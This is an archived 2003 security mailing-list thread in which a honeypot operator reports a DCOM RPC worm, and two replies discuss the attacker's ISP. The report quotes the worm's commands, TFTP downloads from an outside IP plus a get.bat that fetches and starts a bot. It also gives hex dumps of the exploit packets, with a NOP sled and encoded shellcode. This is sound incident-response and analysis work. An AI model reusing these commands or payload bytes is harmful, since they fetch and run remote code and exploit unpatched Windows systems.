RE: DCOM worm with get.bat bot.rar

From: Peter Ellison (p.pe_at_btopenworld.com)
Date: 08/20/03

  • Next message: Bruce Martins: "RE: lots of sobig virus emails."
    To: <incidents@securityfocus.com>
    Date: Wed, 20 Aug 2003 13:55:27 +0100
    
    

    This Ip range is dynamically applied at login time, why the perp hardwired
    his/her "project" your guess is as good as mine. From personal dealings with
    this ISP, allocation of IP is not as dynamic as it's supposed to be. The
    record for me so far is 6 weeks without a change !

    -----Original Message-----
    From: Jeremiah Cornelius [mailto:jeremiah@nur.net]
    Sent: 19 August 2003 18:35
    To: incidents@securityfocus.com
    Subject: Re: DCOM worm with get.bat bot.rar

    The address is a NTL ip in North UK. Likely a DSL there. Looks like it's
    been unplugged, or DoSsd by tftp!

    ----- Original Message -----
    From: "Andrej" <laj@swordlord.com>
    To: <incidents@securityfocus.com>
    Sent: Tuesday, August 19, 2003 2:05 AM
    Subject: DCOM worm with get.bat bot.rar

    > I just got a new DCOM worm on our honeypot. After the exploit on port 135
    > (dump below) a connection was built on port 4444:
    > TFTP -i 81.103.7.66 GET get.bat
    > get.bat
    > exit
    > I was able to get the get.bat it's:
    > mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
    > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
    > TFTP -i 81.103.7.66 GET bot.rar
    > TFTP -i 81.103.7.66 GET unrar.bat
    > TFTP -i 81.103.7.66 GET unrar.exe
    > start unrar.bat
    > exit
    > unfortunately I was not able to download the bot.rar for inspection
    because
    > the connection timed out. Maybe somebody else is more successful
    >
    > cheers
    > andrej
    >
    >
    >
    > [2003-08-19 10:37:34]
    > IPv4: 81.103.7.66 -> *
    > hlen=5 TOS=0 dlen=1500 ID=48197 flags=0 offset=0 TTL=114
    > chksum=43601
    > TCP: port=1176 -> dport: 135 flags=***A**** seq=2683878707
    > ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=61593
    > Payload: length = 1460
    >
    > 000 : 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
    > 010 : 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
    > 020 : 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE ....2$X..EdI.p..
    > 030 : 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00 t,..`^..........
    > 040 : 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00 p^......|^......
    > 050 : 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20 ........*M...j.
    > 060 : AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00 .nr.....MARB....
    > 070 : 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00 ................
    > 080 : 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
    > 090 : A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
    > 0a0 : 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 8..............F
    > 0b0 : 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00 ................
    > 0c0 : 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57 ............MEOW
    > 0d0 : E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00 ................
    > 0e0 : 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 0f0 : 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00 .....(..d)......
    > 100 : 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00 ................
    > 110 : 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 120 : 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 130 : 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 140 : 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 150 : 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 160 : 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 170 : 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
    > 180 : 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 ....@... ...8...
    > 190 : 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 0...............
    > 1a0 : 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O.. ........
    > 1b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 1c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 1d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 1e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 1f0 : 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
    > 200 : 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
    > 210 : C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
    > 220 : 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00 ............x...
    > 230 : 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93 X...........p...
    > 240 : 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00 .O...=.W....2.1.
    > 250 : 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA ................
    > 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 270 : 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
    > 280 : 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00 MEOW............
    > 290 : C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00 .......F;.......
    > 2a0 : C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
    > 2b0 : 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A ...........J....
    > 2c0 : 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
    > 2d0 : 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
    > 2e0 : 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00 ........0...x.n.
    > 2f0 : 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00 ................
    > 300 : 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
    > 310 : 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
    > 320 : 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00 ............0...
    > 330 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 340 : 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF ........h.......
    > 350 : 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
    > 360 : 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
    > 370 : 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
    > 380 : 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
    > 390 : 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
    > 3a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 400 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 410 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 420 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 430 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 440 : 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
    > 450 : FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 ...6..2.........
    > 460 : EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 ........S..tWu..
    > 470 : BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09 ....Z....|..2..
    > 480 : F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6 .:k...M.q....2..
    > 490 : B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF .Z...2.......A..
    > 4a0 : EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD ....6t..Z.~.$|.
    > 4b0 : BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81 .2..."k..LLb....
    > 4c0 : BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81 .2........y|....
    > 4d0 : BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80 .2.........u..j.
    > 4e0 : BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80 .2..........x.z.
    > 4f0 : BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80 .2........9.V.J.
    > 500 : BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80 .2............Z.
    > 510 : BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80 .2.........F..*.
    > 520 : BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81 .2....k.S....f..
    > 530 : BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6 .2..*...b...bk.
    > 540 : A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3 ..L..Z...n.L.$..
    > 550 : 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50 @d.......c....P
    > 560 : D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4 .W...Z........x.
    > 570 : 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4 2....].~'?bB...
    > 580 : AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4 .vj......z...~..
    > 590 : 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F .b..."...c...c.
    > 5a0 : C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B ....".L..k.@d..
    > 5b0 : 77 65 6B D6 wek.
    >
    >
    > [2003-08-19 10:37:34]
    > IPv4: 81.103.7.66 -> *
    > hlen=5 TOS=0 dlen=284 ID=48198 flags=0 offset=0 TTL=114
    > chksum=44816
    > TCP: port=1176 -> dport: 135 flags=***AP*** seq=2683880167
    > ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=21751
    > Payload: length = 244
    >
    > 000 : 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C .....d.!.2..:...
    > 010 : 34 72 98 0B CF 2E 39 0B D7 3A 7F 89 34 72 A0 0B 4r....9..:.4r..
    > 020 : 17 8A 94 80 BF B9 51 DE E2 F0 90 80 EC 67 C2 D7 ......Q......g..
    > 030 : 34 5E B0 98 34 77 A8 0B EB 37 EC 83 6A B9 DE 98 4^..4w...7..j...
    > 040 : 34 68 B4 83 62 D1 A6 C9 34 06 1F 83 4A 01 6B 7C 4h..b...4...J.k|
    > 050 : 8C F2 38 BA 7B 46 93 41 70 3F 97 78 54 C0 AF FC ..8.{F.Ap?.xT...
    > 060 : 9B 26 E1 61 34 68 B0 83 62 54 1F 8C F4 B9 CE 9C .&.a4h..bT......
    > 070 : BC EF 1F 84 34 31 51 6B BD 01 54 0B 6A 6D CA DD ....41Qk..T.jm..
    > 080 : E4 F0 90 80 2F A2 04 00 5C 00 43 00 24 00 5C 00 ..../...\.C.$.\.
    > 090 : 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
    > 0a0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
    > 0b0 : 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 1.1.1.1.1...d.o.
    > 0c0 : 63 00 00 00 01 10 08 00 CC CC CC CC 20 00 00 00 c........... ...
    > 0d0 : 30 00 2D 00 00 00 00 00 88 2A 0C 00 02 00 00 00 0.-......*......
    > 0e0 : 01 00 00 00 28 8C 0C 00 01 00 00 00 07 00 00 00 ....(...........
    > 0f0 : 00 00 00 00 ....
    >
    > --------------------------------------------------------------------------
    -
    > Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
    > - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
    > - Automatically Control P2P, IM and Spam Traffic
    > - Ensure Reliable Performance of Mission Critical Applications
    > - Precisely Define and Implement Network Security and Performance
    Policies
    > **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
    > Visit us at:
    > http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
    > --------------------------------------------------------------------------

    --
    >
    >
    ---------------------------------------------------------------------------
    Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
     - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
     - Automatically Control P2P, IM and Spam Traffic
     - Ensure Reliable Performance of Mission Critical Applications
     - Precisely Define and Implement Network Security and Performance Policies
    **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
    Visit us at:
    http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
    ----------------------------------------------------------------------------
    ---------------------------------------------------------------------------
    Captus Networks - Integrated Intrusion Prevention and Traffic Shaping  
     - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
     - Automatically Control P2P, IM and Spam Traffic
     - Ensure Reliable Performance of Mission Critical Applications
     - Precisely Define and Implement Network Security and Performance Policies
    **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
    Visit us at: 
    http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
    ----------------------------------------------------------------------------
    

  • Next message: Bruce Martins: "RE: lots of sobig virus emails."

    Relevant Pages

    • Re: DCOM worm with get.bat bot.rar
      ... DCOM worm with get.bat bot.rar ... > Captus Networks - Integrated Intrusion Prevention and Traffic Shaping ... > - Ensure Reliable Performance of Mission Critical Applications ...
      (Incidents)
    • Re: Increasing ICMP Echo Requests
      ... In the company I'm working for, we also have noticed a increasing number of ICPM request. ... > Captus Networks - Integrated Intrusion Prevention and Traffic Shaping ... > - Ensure Reliable Performance of Mission Critical Applications ...
      (Incidents)
    • Re: Increasing ICMP Echo Requests
      ... We are looking into filtering ICMP echo ... >Captus Networks - Integrated Intrusion Prevention and Traffic Shaping ... > - Ensure Reliable Performance of Mission Critical Applications ...
      (Incidents)
    • RE: Microsoft extinguishes windowsupdate.com
      ... Subject: Microsoft 'extinguishes' windowsupdate.com ... Captus Networks - Integrated Intrusion Prevention and Traffic Shaping ... - Ensure Reliable Performance of Mission Critical Applications ...
      (Incidents)
    • Re: lots of sobig virus emails.
      ... they shouldn't be sending mail to the ... Captus Networks - Integrated Intrusion Prevention and Traffic Shaping ... Ensure Reliable Performance of Mission Critical Applications ...
      (Incidents)